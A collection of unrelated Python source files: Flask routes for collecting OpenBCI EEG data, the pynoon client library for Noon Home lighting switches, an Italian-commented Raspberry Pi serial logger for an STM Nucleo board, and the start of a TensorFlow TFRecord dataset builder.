def openbci_process_collect_start(process_id: int):
data = request.json
# We now know that the request contains all the keys
if process_id not in shared.get_bci_processes_states():
return {'error_message': f'There is no process with id {process_id}, make sure your process id is valid'}, 404
subprocess_dict = shared.get_bci_processes_states()[process_id]
try:
subprocess_dict['character'] = data['character']
subprocess_dict['frequency'] = float(data['frequency'])
subprocess_dict['phase'] = float(data['phase'])
except KeyError as e:
return {'error_message': f'Key {e} is missing from json.'}, 400
except ValueError as e:
return {'error_message': f'{e}. Make sure the data is the correct type: string for character, and float for phase and frequency.'}, 400
subprocess_dict['state'] = 'collect'
current_app.logger.info(
f"BCI is collecting data for character \"{subprocess_dict['character']}\" with phase {subprocess_dict['phase']} and frequency {subprocess_dict['frequency']}.")
return {'success_message': 'BCI is collecting.'}, 201
@bp.route('/openbci/<int:process_id>/collect/stop', methods=['POST'])
def openbci_process_collect_stop(process_id: int):
if process_id not in shared.get_bci_processes_states():
return {'error_message': 'There is no process with this id, make sure your process id is valid'}, 404
subprocess_dict = shared.get_bci_processes_states()[process_id]
subprocess_dict['state'] = 'ready'
current_app.logger.info(f"Stopped collecting for character {subprocess_dict['character']}.")
current_app.logger.info(f"Writing collected data for character {subprocess_dict['character']} to the database.")
# write to database
if not write_stream_data(subprocess_dict):
return {'error_message': "Did not write any data to the database, make sure to call /openbci/<int:process_id>/collect/start before this route."}, 400
# clear the subprocess_dict
subprocess_dict['character'] = None
subprocess_dict['frequency'] = None
subprocess_dict['phase'] = None
return {'success_message': 'BCI has stopped collecting, and the queue has been written to the database'}, 201
@bp.route("/openbci/<int:process_id>/stop", methods=['POST'])
def openbci_stop(process_id: int):
if process_id not in shared.get_bci_processes_states():
return {'error_message': 'There is no process with this id, make sure your process id is valid'}, 404
subprocess_dict = shared.get_bci_processes_states()[process_id]
if subprocess_dict['state'] == 'collect':
subprocess_dict['state'] = 'stop'
return {"error_message": f"Stopped bci process while it was collecting, data was not written for character {subprocess_dict['character']}."}, 400
subprocess_dict['state'] = 'stop'
if not shared.queue.empty():
return {'error_message': f"Stopped bci process, however the queue for BCI data was not empty, data for character {subprocess_dict['character']} might be incomplete."}, 400
collection = db.session.query(BCICollection).get(subprocess_dict['collection_id'])
collection.collection_end_time = datetime.utcnow()
db.session.commit()
shared.get_bci_processes_states().pop(process_id)
return {'success_message': f"Successfully ended BCI subprocess with id {process_id}"}, 200
def write_stream_data(subprocess_dict):
# ensure any remaining connections are flushed to avoid race conditions
db.engine.dispose()
order = 1
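# 'order' records the position of each sample across queue chunks so that rows can
# be reassembled in capture order later.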
collected_data = []
while not shared.queue.empty():
stream_data = shared.queue.get_nowait()
for row in stream_data:
collected_data.append(
CollectedData(
channel_1=float(row[0]),
channel_2=float(row[1]),
channel_3=float(row[2]),
channel_4=float(row[3]),
channel_5=float(row[4]),
channel_6=float(row[5]),
channel_7=float(row[6]),
channel_8=float(row[7]),
collection_id=subprocess_dict['collection_id'],
character=subprocess_dict['character'],
frequency=subprocess_dict['frequency'],
phase=subprocess_dict['phase'],
order=order
)
)
order += 1
db.session.add_all(collected_data)
db.session.commit()
if len(collected_data) > 0:
current_app.logger.info("Successfully wrote {} samples to the database.".format(len(collected_data)))
return True
return False
|
__init__.py
|
"""
Basic connectivity and control for Noon Home Room Director and Extension switches.
Note that this API is not supported by Noon, and is subject to change or withdrawal at any time.
"""
__author__ = "Alistair Galbraith"
__copyright__ = "Copyright 2018, Alistair Galbraith"
import logging
import requests
import websocket
import threading
import json
import datetime
from typing import Any, Callable, Dict, Type
from pynoon.const import (
LOGIN_URL, RENEW_TOKEN_URL, DEX_URL
)
_LOGGER = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG, format='%(message)s')
NoonEventHandler = Callable[['NoonEntity', Any, 'NoonEvent', Dict], None]
class NoonException(Exception):
pass
class NoonAuthenticationError(NoonException):
pass
class NoonInvalidParametersError(NoonException):
pass
class NoonInvalidJsonError(NoonException):
pass
class NoonDuplicateIdError(NoonException):
pass
class NoonUnknownError(NoonException):
pass
class NoonEvent(object):
pass
class NoonEntity(object):
def __init__(self, noon, guid, name):
"""Initializes the base class with common, basic data."""
self._noon = noon
self._name = name
self._guid = guid
self._subscribers = []
noon._registerEntity(self)
@property
def name(self):
"""Returns the entity name (e.g. Pendant)."""
return self._name
@property
def guid(self):
"""Returns the entity unique ID (GUID from Noon)."""
return self._guid
def _dispatch_event(self, event: NoonEvent, params: Dict):
"""Dispatches the specified event to all the subscribers."""
_LOGGER.debug("Sending notifications!")
for handler, context in self._subscribers:
_LOGGER.debug("...notification sent.")
handler(self, context, event, params)
def subscribe(self, handler: NoonEventHandler, context):
"""Subscribes to events from this entity.
handler: A callable object that takes the following arguments (in order)
obj: the NoonEntity object that generated the event
context: user-supplied (to subscribe()) context object
event: the NoonEvent that was generated.
params: a dict of event-specific parameters
context: User-supplied, opaque object that will be passed to handler.
"""
_LOGGER.debug("Added update subscriber for {}".format(self.name))
self._subscribers.append((handler, context))
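# Example handler (illustrative): def on_change(entity, ctx, event, params): ...
# It is called with this entity, the context passed above, the NoonEvent constant
# and a dict of event parameters whenever _dispatch_event fires.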
def handle_update(self, args):
"""The handle_update callback is invoked when an event is received
for this entity.
Returns:
True - If event was valid and was handled.
False - otherwise.
"""
return False
@classmethod
def fromJsonObject(cls, noon, json):
raise NoonInvalidJsonError
return False
class NoonSpace(NoonEntity):
class Event(NoonEvent):
"""Output events that can be generated.
SCENE_CHANGED: The scene has changed.
Params:
scene: new scene guid (string)
"""
SCENE_CHANGED = 1
"""
LIGHTSON_CHANGED: The space lights have turned on or off.
Params:
lightsOn: Lights are on (boolean)
"""
LIGHTSON_CHANGED = 2
@property
def lightsOn(self):
return self._lightsOn
@lightsOn.setter
def lightsOn(self, value):
valueChanged = (self._lightsOn != value)
self._lightsOn = value
if valueChanged:
self._dispatch_event(NoonSpace.Event.LIGHTSON_CHANGED, {'lightsOn': self._lightsOn})
@property
def activeSceneName(self):
if self.activeScene is not None:
scene = self._scenes.get(self.activeScene, None)
if scene:
return scene.name
else:
return "Unknown"
else:
return "Unknown"
@property
def activeScene(self):
return self._activeScene
@activeScene.setter
def activeScene(self, value):
""" This may be a dict object - {"guid": "some-guid-value-here"} """
actualValue = value
if isinstance(actualValue, Dict) and actualValue.get("guid", None) is not None:
actualValue = actualValue.get("guid")
""" Sanity check - we should have a scene for this """
newScene = self._scenes.get(actualValue, None)
if newScene is None:
if actualValue is not None:
_LOGGER.error("Space changed to new scene '{}', but this scene is unknown!".format(actualValue))
return
""" Debug """
_LOGGER.info("Scene for space '{}' changed to '{}'".format(self.name, newScene.name))
valueChanged = (self._activeScene != actualValue)
self._activeScene = actualValue
if valueChanged:
self._dispatch_event(NoonSpace.Event.SCENE_CHANGED, {'sceneId': self._activeScene})
def setSceneActive(self, active=None, sceneIdOrName=None):
""" (Re)authenticate if needed """
self._noon.authenticate()
""" Replace variables """
if active is None:
active = self.lightsOn
if sceneIdOrName is None:
sceneIdOrName = self.activeScene
""" Get the scene """
targetScene = self._scenes.get(sceneIdOrName, None)
if targetScene is None:
for id, scene in self._scenes.items():
if scene.name == sceneIdOrName:
targetScene = scene
""" Sanity Check """
if targetScene is None:
_LOGGER.error("Did not find scene in space '{}' with name or ID {}".format(self.name, sceneIdOrName))
raise NoonInvalidParametersError
""" Send the command """
_LOGGER.debug("Attempting to activate scene {} in space '{}', with active = {}".format(targetScene.name, self.name, active))
actionUrl = "{}/api/action/space/scene".format(self._noon.endpoints["action"])
result = self._noon.session.post(actionUrl, headers={"Authorization": "Token {}".format(self._noon.authToken)}, json={"space": self.guid, "activeScene": targetScene.guid, "on": active, "tid": 55555})
_LOGGER.debug("Got activate scene result: {}".format(result))
def activateScene(self):
self.setSceneActive(active=True)
def deactivateScene(self):
self.setSceneActive(active=False)
def __init__(self, noon, guid, name, activeScene=None, lightsOn=None, lines={}, scenes={}):
"""Initializes the Space."""
self._activeScene = None
self._lightsOn = None
self._lines = lines
self._scenes = scenes
super(NoonSpace, self).__init__(noon, guid, name)
""" Trigger any initial updates """
self.activeScene = activeScene
self.lightsOn = lightsOn
def __str__(self):
"""Returns a pretty-printed string for this object."""
return 'Space name: "%s" active scene ID: %s, lights on: "%s"' % (
self._name, self._activeScene, self._lightsOn)
def __repr__(self):
"""Returns a stringified representation of this object."""
return str({'name': self._name, 'activeScene': self._activeScene,
'lightsOn': self._lightsOn, 'id': self._guid})
@classmethod
def fromJsonObject(cls, noon, json):
"""Sanity Check"""
if not isinstance(noon, Noon):
_LOGGER.error("Noon object not correctly passed as a parameter")
raise NoonInvalidParametersError
if not isinstance(json, Dict):
_LOGGER.error("JSON object must be pre-parsed before loading")
raise NoonInvalidParametersError
"""Basics"""
guid = json.get("guid", None)
name = json.get("name", None)
if guid is None or name is None:
_LOGGER.debug("Invalid JSON payload: {}".format(json))
raise NoonInvalidJsonError
newSpace = NoonSpace(noon, guid, name)
"""Scenes"""
scenesMap = {}
for scene in json.get("scenes", []):
thisScene = NoonScene.fromJsonObject(noon, newSpace, scene)
scenesMap[thisScene.guid] = thisScene
newSpace._scenes = scenesMap
"""Lines"""
linesMap = {}
for line in json.get("lines", []):
thisLine = NoonLine.fromJsonObject(noon, newSpace, line)
linesMap[thisLine.guid] = thisLine
newSpace._lines = linesMap
""" Status """
lightsOn = json.get("lightsOn", None)
activeScene = json.get("activeScene", {}).get("guid", None)
newSpace.lightsOn = lightsOn
newSpace.activeScene = activeScene
return newSpace
class NoonLine(NoonEntity):
class Event(NoonEvent):
"""Output events that can be generated.
DIM_LEVEL_CHANGED: The dim level of this line has changed.
Params:
dimLevel: New dim level percent (integer)
"""
DIM_LEVEL_CHANGED = 1
"""
LINE_STATE_CHANGED: The line lights have turned on or off.
Params:
lineState: Line State (string - 'on' or 'off')
"""
LINE_STATE_CHANGED = 2
@property
def lineState(self):
return self._lineState
@lineState.setter
def lineState(self, value):
valueChanged = (self._lineState != value)
self._lineState = value
if valueChanged:
self._dispatch_event(NoonLine.Event.LINE_STATE_CHANGED, {'lineState': self._lineState})
@property
def parentSpace(self):
return self._parentSpace
@property
def dimmingLevel(self):
return self._dimmingLevel
@dimmingLevel.setter
def dimmingLevel(self, value):
valueChanged = (self._dimmingLevel != value)
self._dimmingLevel = value
if valueChanged:
self._dispatch_event(NoonLine.Event.DIM_LEVEL_CHANGED, {'dimLevel': self._dimmingLevel})
def set_brightness(self, brightnessLevel):
""" (Re)authenticate if needed """
self._noon.authenticate()
""" Send the command """
actionUrl = "{}/api/action/line/lightLevel".format(self._noon.endpoints["action"])
result = self._noon.session.post(actionUrl, headers={"Authorization": "Token {}".format(self._noon.authToken)}, json={"line": self.guid, "lightLevel": brightnessLevel, "tid": 55555})
_LOGGER.debug("Got set_brightness result: {}".format(result))
def turn_on(self):
self.set_brightness(100)
def turn_off(self):
self.set_brightness(0)
def __init__(self, noon, space, guid, name, dimmingLevel=None, lineState=None):
"""Initializes the Space."""
self._lineState = None
self._dimmingLevel = None
self._parentSpace = space
super(NoonLine, self).__init__(noon, guid, name)
""" Trigger any initial updates """
self.lineState = lineState
self.dimmingLevel = dimmingLevel
@classmethod
def fromJsonObject(cls, noon, space, json):
"""Sanity Check"""
if not isinstance(noon, Noon):
_LOGGER.error("Noon object not correctly passed as a parameter")
raise NoonInvalidParametersError
if not isinstance(json, Dict):
_LOGGER.error("JSON object must be pre-parsed before loading")
raise NoonInvalidParametersError
"""Basics"""
guid = json.get("guid", None)
name = json.get("displayName", None)
if guid is None or name is None:
_LOGGER.debug("Invalid JSON payload: {}".format(json))
raise NoonInvalidJsonError
newLine = NoonLine(noon, space, guid, name)
""" Status """
lineState = json.get("lineState", None)
dimmingLevel = json.get("dimmingLevel", None)
newLine.lineState = lineState
newLine.dimmingLevel = dimmingLevel
return newLine
def __str__(self):
"""Returns a pretty-printed string for this object."""
return 'Line name: "%s" lights on: %s, dim level: "%s"' % (
self._name, self._lineState, self._dimmingLevel)
def __repr__(self):
"""Returns a stringified representation of this object."""
return str({'name': self._name, 'dimmingLevel': self._dimmingLevel,
'lightsOn': self._lineState, 'id': self._guid})
class NoonScene(NoonEntity):
def __init__(self, noon, space, guid, name):
"""Initializes the Space."""
self._parentSpace = space
super(NoonScene, self).__init__(noon, guid, name)
@classmethod
def fromJsonObject(cls, noon, space, json):
"""Sanity Check"""
if not isinstance(noon, Noon):
_LOGGER.error("Noon object not correctly passed as a parameter")
raise NoonInvalidParametersError
if not isinstance(json, Dict):
_LOGGER.error("JSON object must be pre-parsed before loading")
raise NoonInvalidParametersError
"""Basics"""
guid = json.get("guid", None)
name = json.get("name", None)
if guid is None or name is None:
_LOGGER.debug("Invalid JSON payload: {}".format(json))
raise NoonInvalidJsonError
newScene = NoonScene(noon, space, guid, name)
return newScene
def __str__(self):
"""Returns a pretty-printed string for this object."""
return 'Scene name: "%s" id: "%s"' % (
self._name, self._guid)
def __repr__(self):
"""Returns a stringified representation of this object."""
return str({'name': self._name, 'id': self._guid})
class Noon(object):
""" Base object for Noon Home """
@property
def spaces(self):
return self.__spaces
@property
def lines(self):
return self.__lines
def __init__(self, username=None, password=None):
""" Create a PyNoon object
:param username: Noon username
:param password: Noon password
:returns PyNoon base object
"""
# Key internal flags
self.__authenticated = False
self.__loginResponse = None
self.__token = None
self.__tokenValidUntil = datetime.datetime.now()
self.__tokenRenewValidUntil = datetime.datetime.now()
self.__session = requests.Session()
self.__subscribed = False
# Store credentials
self.__username = username
self.__password = password
self.__endpoints = {}
# Flag for tracking errors
self.__errorCount = 0
self.__lastConnectAttempt = 0
# External Properties
self.__spaces = {}
self.__lines = {}
self.__scenes = {}
self.__allEntities = {}
@property
def endpoints(self):
return self.__endpoints
@property
def session(self):
return self.__session
@property
def authToken(self):
return self.__token
def authenticate(self):
""" Do we already have valid tokens? """
if self.__token is not None and self.__tokenValidUntil > datetime.datetime.now():
_LOGGER.debug("Using cached token, which should still be valid")
return
""" Authenticate user, and get tokens """
_LOGGER.debug("No valid token or token expired. Authenticating...")
if(self.__tokenRenewValidUntil > datetime.datetime.now()):
url = RENEW_TOKEN_URL
json = self.__loginResponse
else:
url = LOGIN_URL
json = {"email": self.__username, "password": self.__password}
result = self.__session.post(url, json=json).json()
if isinstance(result, dict) and result.get("token") is not None:
""" Debug """
_LOGGER.debug("Authenticated successfully with Noon")
""" Store the token and expiry time """
self.__authenticated = True
self.__loginResponse = result
self.__token = result.get("token")
self.__tokenValidUntil = datetime.datetime.now() + datetime.timedelta(seconds = (result.get("lifetime",0)-30))
self.__tokenRenewValidUntil = datetime.datetime.now() + datetime.timedelta(seconds = (result.get("renewLifetime",0)-30))
_LOGGER.debug("Authenticated. Token expires at {:%H:%M:%S}.".format(self.__tokenValidUntil))
""" Get endpoints if needed """
if len(self.__endpoints) == 0:
self._refreshEndpoints()
else:
_LOGGER.debug("Response: {}".format(result))
raise NoonAuthenticationError
def _refreshEndpoints(self):
""" Update the noon endpoints for this account """
_LOGGER.debug("Refreshing endpoints...")
result = self.__session.get(DEX_URL, headers={"Authorization": "Token {}".format(self.__token)}).json()
if isinstance(result, dict) and isinstance(result.get("endpoints"), dict):
self.__endpoints = result.get("endpoints")
else:
_LOGGER.debug("Response: {}".format(result))
raise NoonAuthenticationError
def _registerEntity(self, entity: NoonEntity):
""" EVERYTHING """
self.__allEntities[entity.guid] = entity
""" SPACE """
if isinstance(entity, NoonSpace):
existingEntity = self.__spaces.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New space '{}' has same ID as existing space '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self.__spaces[entity.guid] = entity
""" LINE """
if isinstance(entity, NoonLine):
existingEntity = self.__lines.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New line '{}' has same ID as existing line '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self.__lines[entity.guid] = entity
""" SCENE """
if isinstance(entity, NoonScene):
existingEntity = self.__scenes.get(entity.guid, None)
if existingEntity is not None:
if entity.name != existingEntity.name and False:
_LOGGER.error("New scene '{}' has same ID as existing scene '{}'".format(entity.name, existingEntity.name))
raise NoonDuplicateIdError
else:
return
else:
self.__scenes[entity.guid] = entity
def discoverDevices(self):
""" (Re)authenticate if needed """
self.authenticate()
""" Get the device details for this account """
_LOGGER.debug("Refreshing devices...")
queryUrl = "{}/api/query".format(self.__endpoints["query"])
result = self.__session.post(queryUrl, headers={"Authorization": "Token {}".format(self.__token), "Content-Type":"application/graphql"}, data="{spaces {guid name lightsOn activeScene{guid name} lines{guid lineState displayName dimmingLevel multiwayMaster { guid }} scenes{name guid}}}").json()
if isinstance(result, dict) and isinstance(result.get("spaces"), list):
for space in result.get("spaces"):
# Create the space
thisSpace = NoonSpace.fromJsonObject(self, space)
# Debug
_LOGGER.debug("Discovered space '{}'".format(thisSpace.name))
else:
_LOGGER.error("Invalid device discovery response from Noon")
_LOGGER.warn("Response: {}".format(result))
def connect(self):
""" (Re)authenticate if needed """
self.authenticate()
""" Connect on a separate thread """
if not self.__subscribed:
self.__subscribed = True
self.__event_handle = threading.Event()
event_thread = threading.Thread(target=self._thread_event_function)
event_thread.start()
else:
_LOGGER.error("Already attached to event stream!")
def _thread_event_function(self):
self.__subscribed = True
self.__lastConnectAttempt = datetime.datetime.now()
websocket.enableTrace(False)
eventStreamUrl = "{}/api/notifications".format(self.__endpoints["notification-ws"])
self.__websocket = websocket.WebSocketApp(eventStreamUrl,
header = {
"Authorization": "Token {}".format(self.__token)
},
on_message = _on_websocket_message,
on_error = _on_websocket_error,
on_close = _on_websocket_close)
self.__websocket.on_open = _on_websocket_open
self.__websocket.parent = self
self.__websocket.run_forever(ping_interval=30)
return True
def _handle_change(self, changeSummary):
guid = changeSummary.get("guid", None)
if guid is None:
_LOGGER.error("Cannot process change - no GUID in {}".format(changeSummary))
return
affectedEntity = self.__allEntities.get(guid, None)
if affectedEntity is None:
_LOGGER.debug("UNEXPECTED: Got change notification for {}, but not an expected entity! ({}".format(guid, changeSummary))
return
_LOGGER.debug("Got change notification for '{}' - {}".format(affectedEntity.name, changeSummary))
changedFields = changeSummary.get("fields", [])
writeableFields = [attr for attr, value in vars(affectedEntity.__class__).items()
if isinstance(value, property) and value.fset is not None]
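# Only properties that expose a setter (e.g. lightsOn, activeScene, lineState,
# dimmingLevel) are applied, so each change notification is routed through the
# property setters above, which in turn dispatch subscriber events.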
_LOGGER.debug("Settable fields for this entity - {}".format(writeableFields))
for changedField in changedFields:
key = changedField.get("name")
value = changedField.get("value")
if key in writeableFields:
_LOGGER.debug("...setting {} = {}".format(key, value))
setattr(affectedEntity, key, value)
else:
_LOGGER.debug("...ignoring {} = {}".format(key, value))
def _websocket_connected(self):
_LOGGER.debug("Successful connection. Resetting error timers.")
self.__errorCount = 0
def _websocket_disconnected(self):
""" Flag disconnected """
self.__subscribed = False
""" Look at our failure time. If it's within the last 30 seconds, we'll abort rather than spam Noon's servers """
if self.__lastConnectAttempt > (datetime.datetime.now() - datetime.timedelta(seconds = 30)):
_LOGGER.error("Failed to open websocket connection on first attempt. Giving up.")
raise NoonException
else:
self.connect()
def _websocket_message(self, message):
""" Ignore empty messages """
if message is None or len(message) < 5:
return
""" Attempt to parse the message """
try:
jsonMessage = json.loads(message)
except:
_LOGGER.debug("Failed to parse message: {}".format(message))
return
""" What sort of message is this? """
if isinstance(jsonMessage, Dict):
""" State change notification """
if jsonMessage.get("event", None) == "notification" and isinstance(jsonMessage.get("data"), Dict):
data = jsonMessage.get("data")
changes = data.get("changes", [])
for change in changes:
self._handle_change(change)
else:
_LOGGER.error("Unexpected notifiction - {}".format(jsonMessage))
else:
_LOGGER.error("Invalid notifiction - {}".format(jsonMessage))
def _on_websocket_message(ws, message):
ws.parent._websocket_message(message)
def _on_websocket_error(ws, error):
_LOGGER.error("Websocket: Error - {}".format(error))
def _on_websocket_close(ws):
_LOGGER.error("Websocket: Closed")
ws.parent._websocket_disconnected()
def _on_websocket_open(ws):
_LOGGER.debug("Websocket: Opened")
ws.parent._websocket_connected()
|
raspiNucleo.py
|
import serial.tools.list_ports, serial
import datetime, sys, types, os, time, threading, shelve
import dialog
"""interfaccia di comunicazione Raspberry NucleoSTM
Questo modulo permette la coomunicazione tra STMnucleo e Raspberry tramite porta usb
per comandare un'interfaccia sensori e raccogliere dati in file csv
il codice si divide in sue parti: prima la nucleo entra in modalità init
e continua inviare una stringa con il nome delle variabili. usare lo user button per
avviare questa sessione. attendere la conferma di ricevuto dati dal rasp
rasp deve poi dare un parse delle variabili e chidere tramite terminale quali memorizzare
nella seconda fase, la nucleo manda i dati via usb e rasp li appende al file csv fio al
termine dell'esperimento.
todo, inviare info si sensori per avere i dati con la precisione strumenti
"""
class menu_item:
def __init__(self, name, info):
self.name = name
self.info = info
# todo: make an instrument class
# GLOBAL VARIABLES
sampling_Hz = 1000 # period_us microseconds nucleo timer
mem_index = []
available_instruments = []
instruments_db = []
file_name, last_description, last_folder = "", '', ''
"""STRUTTURA MENU INIZIALE """
# sampling rate menu
sampling_rate = menu_item(name='sampling rate',
info="frequenza di campionamento in Hz")
# instrument selection menu (seleziona_strumenti)
seleziona_strumenti = menu_item(name='seleziona strumenti',
info="spostare a destra gli strumenti da utilizzare. viene mostrata la configurazione attuale")
# instrument setup menu (imposta_strumenti)
imposta_strumenti = menu_item(name='imposta strumenti',
info="impostare pin e tipo di strumento")
# new measurement (nuova_misura)
nuova_misura = menu_item(name='nuova misura',
info='premere ok per iniziare la registrazione')
app = {
'1': sampling_rate,
'#': imposta_strumenti,
'2': seleziona_strumenti,
'3': nuova_misura
}
def sampling_rate_run(self):
"""
function bound to the sampling_rate object. Asks the user to set a new sampling rate value
:param self:
:return:
"""
# todo: update the parameter on the nucleo over serial
global sampling_Hz
code, ans_str = d.inputbox(title=self.name,
text=self.info+"\nattuale: {}.\tNuovo:".format(sampling_Hz))
if code == d.OK and ans_str:
sampling_Hz = int(ans_str)
update_sampling_rate()
def seleziona_strumenti_run(self):
"""
bind oggetto seleziona_strumenti. imposta la variabile mem_index con gli indici
degli strumenti da memorizzare secondo l'ordine in cui comunica la nucleo
:param self:
:return:
"""
# todo: fix update_strumenti
global mem_index
update_strumenti()
# show the current configuration
item_list = []
for i in range(len(available_instruments)):
if i in mem_index:
item_list.append((str(i), instruments_db[int(available_instruments[i])][0], True))
else:
item_list.append((str(i), instruments_db[int(available_instruments[i])][0], False))
code, ans = d.buildlist(title=self.name,
text=self.info,
items=item_list)
if code == d.OK:
mem_index = list(int(ans[i]) for i in range(len(ans)))
def nuova_misura_run(self):
"""
bind oggetto nuova_misura. crea il nuovo file csv specificando la cartella e la descrizione
:param self:
:return:
"""
global file_name, last_folder, last_description
# DOC (label, yl, xl, item, yi, xi, field_length, input_length),(row and column numbers starting from 1).
col = max([len('folder: data/'),len('description')])+1
element_list= [('folder: data/', 1, 1, last_folder, 1, col, 20, 100),
('description:', 2, 1, last_description, 2, col, 20, 100)]
# instrument info
strumenti_str = ', '.join(available_instruments[i] for i in mem_index)
code, ans_list = d.form(title=self.name,
text=(self.info + '\nSampling_rate:' + str(sampling_Hz) + '\nStrumenti:' + strumenti_str),
elements=element_list)
if code == d.CANCEL:
return menu()
else:
# check for problems with '/'
folder, descr = ans_list[0].strip('/'), ans_list[1]
# remember the last preferences
last_folder, last_description = folder, descr
# correct this way, the raspberry has a different timezone
filename = str(datetime.datetime.now()).split('.')[0].split()
filename = '_'.join(filename[::-1])
# check whether the folder exists
if not folder:
folder = 'data' # without '/' [1]
elif folder in os.listdir('data/'):
folder = 'data/' + folder
else:
folder = 'data/' + folder
os.mkdir(folder)
# create the csv file and write the header [1]
file_name = '{}/{}.csv'.format(folder, filename)
with open(file_name, mode='w') as file:
print(descr, file=file)
print('sample rate:' + str(sampling_Hz), file=file)
print(strumenti_str, file=file)
return record()
# BIND custom function to objects
sampling_rate.run = types.MethodType(sampling_rate_run, sampling_rate)
seleziona_strumenti.run = types.MethodType(seleziona_strumenti_run, seleziona_strumenti)
nuova_misura.run = types.MethodType(nuova_misura_run, nuova_misura)
def menu():
"""
show the main menu
:return:
"""
choice_list = []
for opt in sorted(app):
choice_list.append((opt, app[opt].name))
code, ans = d.menu(title='RASPINUCLEO',
text='interfaccia di comunicazione raspi nucleo',
choices=choice_list)
if code == d.OK:
return app[ans].run()
else:
logout()
def update_strumenti():
"""
update the list of available instruments
:return:
"""
global available_instruments
# start instrument mode with 'i'
write('i')
available_instruments = read()
def update_sampling_rate():
"""Comunica alla Nucleo il nuovo PERIODO di campionamento in
nuovo periodo = 1000000[us]/f[Hz]
"""
str_LF = str(1000000 // sampling_Hz)
write(str_LF)
pass
def toggle_record():
"""send 'r' to nucleo and nucleo should stop sending data if
sendong, shoud start if not sending
"""
write('r')
pass
def record():
"""avvia la registrazione sulla nucleo esalva i valori sul file csv
:return:
"""
toggle_record()
threading.Thread(target=tail).start()
with open(file_name, mode='a') as file:
in_str = read()
while in_str: # in_str is an empty list if there is nothing to read
# todo: the nucleo should only send over serial what the user wants! otherwise you lose speed
# todo: remove mem_index from the algorithm
in_str = read()
print(in_str, file=file)
in_str = ser.readline()
d.infobox(title='WARNING',
text='recording has stopped')
time.sleep(1)
def tail():
"""
show the contents of the csv file while it is being populated
:return:
"""
code = d.msgbox(text='scrivendo i dati su: {}\nPremere ok per terminare '.format(file_name))
if code:
toggle_record()
def logout():
"""
store the user variables for the next startup
:return:
"""
with shelve.open('last_session', flag='w') as db:
db['index'] = mem_index
db['rate'] = sampling_Hz
db['folder'] = last_folder
db['description'] = last_description
os.system('clear')
return exit(0)
def start_load():
"""carica le variabili utente dal database e gli strumenti dal file instruments.csv
:return:
"""
global last_description, last_folder, mem_index, sampling_Hz
with shelve.open('last_session', flag='r') as db:
mem_index = db['index']
last_folder = db['folder']
last_description = db['description']
sampling_Hz = db['rate']
update_sampling_rate() # call after the value has been loaded
update_strumenti() # allows starting a new measurement right away
print(available_instruments)
with open('instruments.csv', mode='r') as file:
for line in file:
instruments_db.append(line.split(','))
pass
def write(string):
"""aggiunge LF a string e converte in binario, quindi scrive in ser"""
if ser.writable():
# TODO: figure out why this weirdness is needed!
string = string[:1] + ' ' + string[1:] + '\n'
ser.flushOutput()
ser.write(bytearray(string, 'utf-8'))
# print('sent: ', string.encode('utf-8'))
else:
print('ser not writable')
pass
def read():
"""read serial and return string array
:param ser: serial object Nucleo
:return: empty array if serial is not readable
"""
ser.reset_input_buffer()
data_list = str(ser.readline()).strip("b' \\n").split() # remove the byte-to-str conversion characters
return data_list
""" AVVIO SERIALE NUCLEO
suppogo che ci sia solo la nucleo attaccata al raspberry quindi
prendo la prima usb disponibile nella lista
"""
try:
nucleo_port = serial.tools.list_ports.comports()[0][0]
except:
print("nucleo è connessa?")
exit(0)
ser = serial.Serial(port=nucleo_port, baudrate=921600, timeout=2, write_timeout=2)
d = dialog.Dialog(autowidgetsize=True)
if __name__ == '__main__':
start_load()
print()
while True:
menu()
|
tfrecorder_builder.py
|
import tensorflow as tf
import os
import math, json
import sys
from core import dataset_utils
import shutil
import glob
from multiprocessing import Process
import numpy as np
import random
def _get_dataset_filename(dataset_name, output_dir, phase_name, shard_id, num_shards):
output_filename = '%s_%s_%05d-of-%05d.tfrecord' % (dataset_name, phase_name, shard_id, num_shards)
return os.path.join(output_dir, output_filename)
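# Example: _get_dataset_filename("fashionstyle14", out_dir, "train", 0, 4) returns
# "<out_dir>/fashionstyle14_train_00000-of-00004.tfrecord".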
def _dataset_exists(dataset_name, output_dir, phase_name, num_shards):
for shard_id in range(num_shards):
output_filename = _get_dataset_filename(
dataset_name, output_dir, phase_name, shard_id, num_shards)
if not tf.gfile.Exists(output_filename):
return False
return True
def _get_filenames_and_classes(image_dir):
root = image_dir
directories = []
class_names = []
for filename in os.listdir(root):
path = os.path.join(root, filename)
if os.path.isdir(path):
directories.append(path)
class_names.append(filename)
photo_filenames = []
# todo: handle both uppercase and lowercase
if os.name == 'nt':
exts = ["jpg", "jpeg"]
else:
exts = ["jpg", "JPEG", "JPG", "jpeg"]
for directory in directories:
for ext in exts:
for path in glob.glob(os.path.join(directory, "*.%s" % ext)):
# path = os.path.join(directory, filename)
photo_filenames.append(path)
return photo_filenames, sorted(class_names)
def _get_filenames_and_classes_by_train_test(image_dir, train_ratio=0.9):
root = image_dir
directories = []
class_names = []
for filename in os.listdir(root):
path = os.path.join(root, filename)
if os.path.isdir(path):
directories.append(path)
class_names.append(filename)
train_photo_filenames = []
test_photo_filenames = []
random.seed(0)
# todo: handle both uppercase and lowercase
if os.name == 'nt':
exts = ["jpg", "jpeg"]
else:
exts = ["jpg", "JPEG", "JPG", "jpeg"]
for directory in directories:
tmp_photo_filenames = []
for ext in exts:
for path in glob.glob(os.path.join(directory, "*.%s" % ext)):
# path = os.path.join(directory, filename)
tmp_photo_filenames.append(path)
random.shuffle(tmp_photo_filenames)
train_cnt = int(float(len(tmp_photo_filenames)) * train_ratio)
train_photo_filenames += tmp_photo_filenames[:train_cnt]
test_photo_filenames += tmp_photo_filenames[train_cnt:]
return train_photo_filenames, test_photo_filenames, sorted(class_names)
class ImageReader(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self, num_channels):
# Initializes function that decodes Grayscale JPEG data.
self.num_channels = num_channels
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=num_channels)
def read_image_dims(self, sess, image_data):
image = self.decode_jpeg(sess, image_data)
return image.shape[0], image.shape[1]
def decode_jpeg(self, sess, image_data):
image = sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
